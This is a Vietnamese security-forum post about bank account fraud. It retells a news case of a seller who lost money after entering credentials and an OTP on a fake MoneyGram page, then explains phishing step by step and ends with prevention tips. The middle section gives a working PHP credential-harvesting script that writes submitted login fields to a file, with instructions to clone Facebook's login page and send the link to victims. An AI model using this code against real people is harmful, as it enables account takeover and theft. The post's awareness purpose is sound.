Lừa đảo tài khoản ATM - Whitehat.vn

Thông báo

Collapse
No announcement yet.

Lừa đảo tài khoản ATM

Collapse
X
  • Lọc
  • Thời gian
  • Show
Clear All
new posts

  • Lừa đảo tài khoản ATM

    Gần đây, những vụ mất tiền trong tài khoản ATM xảy ra liên tiếp, dấy lên hồi chuông cảnh báo về tội phạm trộm cắp tiền trong tài khoản ATM
    Click image for larger version

Name:	image_7219.jpg
Views:	2
Size:	9,0 KB
ID:	62040

    Những thủ đoạn lừa đảo đánh cắp thông tin tài khoản qua facebook, lừa người mua hàng thông qua các trang web nhái, lừa lấy mã OTP… tuy không mới nhưng do thiếu cảnh giác, không ít người dùng thẻ ATM vẫn bị lừa mất tiền trong tài khoản.
    Thông qua các vụ mất tiền trong tài khoản ATM đăng trên báo mạng những ngày qua, ta có thể thấy rõ phẫn nào hình thức, thủ đoạn lừa đoạt chiếm đảo của bọn tội phạm.
    Dẫn chứng cụ thể qua một bài báo mạng
    Là người bán hàng qua mạng, chị Nguyễn Hoài T (Hà Đông, Hà Nội) thường phải thực hiện các giao dịch qua Internet Banking. Giữa tháng 12-2016, có một khách hàng tự xưng là Việt kiều Canada đặt mua hàng với trị giá 13,5 triệu đồng và sẽ thanh toán qua dịch vụ MoneyGram.

    Sau khi nhận được tin nhắn có nội dung thông báo chuyển khoản theo dịch vụ MoneyGram, kèm theo đường link yêu cầu chị xác nhận các thông tin cá nhân như số tài khoản, mật khẩu... chị nhận được tin nhắn thông báo mã OTP (mã khóa bí mật dùng 1 lần). Chị T điền mã này vào trang web trên thì lập tức nhận được tin nhắn bị trừ 24 triệu đồng - gần như toàn bộ số tiền trong tài khoản của chị. Liên hệ với ngân hàng, chị T mới biết mình bị lừa đánh cắp mã OTP do truy cập vào trang web giả mạo bằng đường link mà đối tượng lừa đảo gửi tới.
    Một hình thức Social Engineering quá quen thuộc với những ai có tìm hiểu về nó, nhưng đối với những người chưa nghe, chưa biết thì nó là một chiêu lừa đảo vô cùng hữu hiệu. Lợi dụng điểm đó, bọn tội phạm có thể chiếm đoạt được nhiều thứ như thông tin cá nhân, tài khoản facebook, twitter hay tài khoản ngân hàng để chiếm đoạt tiền như trên.
    Qua trích dẫn từ báo trên ta có thể thấy, lợi dụng tên tuổi của dịch vụ chuyển tiền MoneyGram, tên tội phạm đã lừa được nạn nhân rất thành công. Khi gửi một link yêu cầu xác thực thông tin cá nhân - có thể đây là link trang web do chính hắn tạo ra, có giao diện như trang thật. Khi nạn nhân nhập số tài khoản, mật khẩu và xác nhận, lập tức phía tội phạm đã có được thông tin này của nạn nhân. Khi đó hắn lập tức nhập thông tin tài khoản và mật khẩu vào dịch vụ chuyển tiền. Ngay lập tức nó yêu cầu mã OTP. Khôn khéo hơn, trên trang web giả mạo đó còn yêu cầu nhập mã OTP nên khi thấy có mã OTP về tin nhắn nạn nhận lập tức nhập vào. Khi đó, tên tội phạm đã có mọi thông tin để có thể chuyển tiền tùy ý hay làm bất cứ việc gì trên tài khoản ngân hàng của nạn nhân.

    Vậy nguyên tắc hoạt động có nó ra sao ?


    Để hiểu rõ nó hoạt động ra sao cũng như rút ra được những bài học để tránh sự việc xảy ra
    Nó cũng tương tự như hình thức chiếm đoạt tài khoản facebook, nói chung hình thức chiếm đoạt tài khoản của bất kỳ trang web nào cũng có thể thực hiện được nếu người dùng quá nhẹ dạ cả tin hay mất cảnh giác.

    Đầu tiên ta sẽ lấy mã nguồn đăng nhập của trang facebook bằng cách vào trang login của facebook và nhấn view sourcecode, copy hết mã nguồn đó cho vào text và lưu lại dưới đuôi html. Trong mã nguồn đó ta có chỉnh sửa một vài chỗ để thực hiền được thành công.
    Tạo một file php
    Mã:
    <?php
    header (‘Location:http://www.facebook.com;);
    $handle = fopen(“pass.txt”, “a”);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    }
    fwrite($handle, “\r\n”);
    fclose($handle);
    exit;
    ?> 
    Sau đó up lên host và gửi link cho nạn nhân để lừa đảo chiếm đoạt thôi.
    Phòng tránh
    Không click vào bất cứ link nào khả nghi, hay không nhập bất cứ tài khoản password của mình vào những trang web khả nghi. Đặc biệt chú ý nhìn địa chỉ website trên thanh address, mặc dù giao diện rất giống nhưng chưa chắc đó là web thật, mà hãy nhìn địa chỉ trang web đó.
    Tuy nhiên, có những phương pháp còn nguy hiểm hơn, nó giả mạo DNS của trang web đó, nhìn bên ngoài, nhìn đường link của web thì đúng rồi, nhưng bên trong nó đã trỏ domain về một địa chỉ IP khác.
    Vì vậy, hãy trang bị cho mình những kiến thức nhất định để có thể phòng tránh được những rủi ro cho chính bản thân mình.
    Last edited by adamdj; 11/01/17, 07:56 AM.
Bạn cần đăng nhập hoặc đăng ký để viết bài
Đăng nhập/Đăng ký
Previously entered content was automatically saved. Restore or Discard.
Auto-Saved
x
x
Mời bạn bấm like để theo dõi Whitehat forum trên Facebook